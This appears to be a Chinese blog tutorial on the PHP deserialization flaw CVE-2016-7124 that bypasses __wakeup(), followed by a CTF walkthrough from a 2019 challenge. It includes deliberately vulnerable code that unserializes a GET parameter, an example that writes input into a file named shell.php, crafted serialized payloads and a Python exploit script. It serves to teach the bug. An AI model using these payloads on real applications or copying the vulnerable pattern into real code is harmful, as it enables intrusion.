CVE-2016-7124 PHP反序列化漏洞

漏洞概况

ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.

环境要求

• PHP 5 < 5.6.25
• PHP 7 < 7.0.10

漏洞分析

该漏洞的与php的魔术方法__wakeup()相关。我们知道，如果存在__wakeup()方法，进行反序列化操作调用unserialize()方法时会先调用__wakeup()方法。当序列化字符串中表示对象属性个数的数值大于真实属性个数时会绕过__wakeup()函数。

<?php

class test{
	public $name = "fairy";
	public function __wakeup(){
		echo "this is __wakeup<br>";
	}
	public function __destruct(){
		echo "this is __destruct<br>";
	}
}

$s = new test();
echo serialize($s) . "<br>";
// O:4:"test":1:{s:4:"name";s:5:"fairy";}

?>

上面这段代码经过序列化后输出的结果是：

O:4:"test":1:{s:4:"name";s:5:"fairy";}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

其中对象类型有以下几种：

a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string

下面是最简单的反序列化例子：

<?php

class test{
	public $name = "fairy";
	public function __wakeup(){
		echo "this is __wakeup<br>";
	}
	public function __destruct(){
		echo "this is __destruct<br>";
	}
}

// $s = new test();
// echo serialize($s) . "<br>";
// O:4:"test":1:{s:4:"name";s:5:"fairy";}

$str = $_GET["s"];
@$un_str = unserialize($str);

echo $un_str->name."<br>";

?>

当传入的序列化字符串满足属性个数与真实属性个数一致时，是正常调用__wakeup()方法的

?s=O:4:"test":1:{s:4:"name";s:5:"fairy";}

当传入的属性个数>真实属性个数时会绕过__wakeup()方法，直接执行__destruct()。

?s=O:4:"test":2:{s:4:"name";s:5:"fairy";}

漏洞利用

下面是一个漏洞利用的例子：

<?php

class test{
	public $name = "fairy";

	public function __wakeup(){
		echo "this is __wakeup<br>";
		foreach (get_object_vars($this) as $k => $v) {
			$this->$k = null;
		}
	}

	public function __destruct() {
		echo "this is __destruct<br>";
		$fp = fopen("C:\\phpStudy\\www\\1\\shell.php", "w");
		fputs($fp, $this->name);
		fclose($fp);
	}
}

// $s = new test();
// echo serialize($s);
// O:4:"test":1:{s:4:"name";s:5:"fairy";}


$str = $_GET["s"];
$un_str = unserialize($str);

echo $un_str->name . "<br>";

__wakeup()方法中的这段代码：

foreach (get_object_vars($this) as $k => $v) {
	$this->$k = null;
}

会导致对象的属性都被清空为null，而__destruct()函数又会尝试写入传入的对象属性。

可以看到在正常情况下什么东西都不会被写入

将对象属性个数改为2就可以成功绕过__wakeup()

查看文件，已经写入。

CTF原题

这道题来自极客大挑战2019，可以在赵师傅的buuoj上进行练习。这道题就是简单的反序列化入门题，就一个小坑点。

打开题目可以看到

关键的提示是备份，在ctf比赛中常见的备份有：

.bak
.git泄露
www.zip
// etc

尝试了下www.zip，刚好发现了备份文件，下载下来解压有这些文件，但是用屁股想都知道flag不会在所谓的flag.php中。

查看class.php:

<?php
include 'flag.php';
error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

这段代码说明要读取flag要满足两个条件：

1. $this->username === 'admin'
2. $this->password != 100

而__wakeup()方法会将$this->username设置成guest，所以只要绕过__wakeup()方法就可以了。

payload：

<?php
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
   }
}

$name = new Name("admin", 100);

echo serialize($name);

?>

生成payload：

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

结合index.php中的代码：

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

将该字符串赋给get请求参数select即可

?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

但是并没有如期得到flag？这是由php对象序列化中的字段名决定的。

前面已经介绍过，在php中，对象（object）通常被序列化为：

O:<length>:"<class name>":<n>:{<field name 1><field value 1><field name
2><field value 2>...<field name n><field value n>}

其中是字段名，包括在对象所在类及其祖先类中用var，public，protected和private声明的字段，但是不包括static和const声明的静态字段。也就是说只有实例（instance）字段。字段名是字符串型，序列化后的格式与字符串型数据序列化后的格式相同；字段值可以是任意类型，其序列化后的格式与其所对应的类型序列化后的格式相同。但字段名的序列化与他们声明的可见性是有关的（也就是public、private、protected）。具体参考： https://blog.csdn.net/a5816138/article/details/53303299

对象字段名的序列化格式要求是这样的：

1. var和public：var和public声明的字段都是公共字段，因此它们的字段名的序列化格式是相同的。公共字段的字段名按照声明时的字段名进行序列化，但是序列化后的字段名中不包括声明时的变量前缀符号$。
2. protected: protected声明的字段为保护字段，在所声明的类和该类的子类中可见，但在该类的实例中不可见，因此保护字段的字段名在序列化时，字段名前面会加上\0*\0，这里的\0表示ASCII码的0字符，而不是\0组合。
3. private : private声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见，所以私有字段的字段名在序列化时，字段名前面会加上\0<declared class name>\0前缀。这里<declared class name>表示的是声明该私有字段的类的类名，而不是被序列化的对象的类名。因为声明该私有字段的类不一定是被序列化的对象的类，也有可能是它的祖先类。
4. 字段名被作为字符串序列化时，字符串值中包括根据其可见性所加的前缀，字符串长度也包括所加前缀的长度，其中\0字符也是计算长度的。仔细看我们生成的payload，s:14:"Nameusername"，可以发现前面的长度是计算\0字符长度的，而\0在ASCII中表示不可见。
5. \0可以用%00替代。

所以真正的payload为：

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

这里的一个坑点就是，如果你不用%00而是\0，就要注意，需要用python传值，直接url请求是不行的。前面已经说过，\0表示ASCII码的0字符，表示不可见，而不是\0组合。如果直接用网址请求，那会被解析成两个字符\+0。

python exp:

__author__ = 'Bantian'

import requests

payload = 'O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}'
url = "http://7a59a722-eec7-4ec5-851f-e2daf8bbbba1.node3.buuoj.cn?select=" + payload
r = requests.get(url)
print (r.text)

同样拿到flag。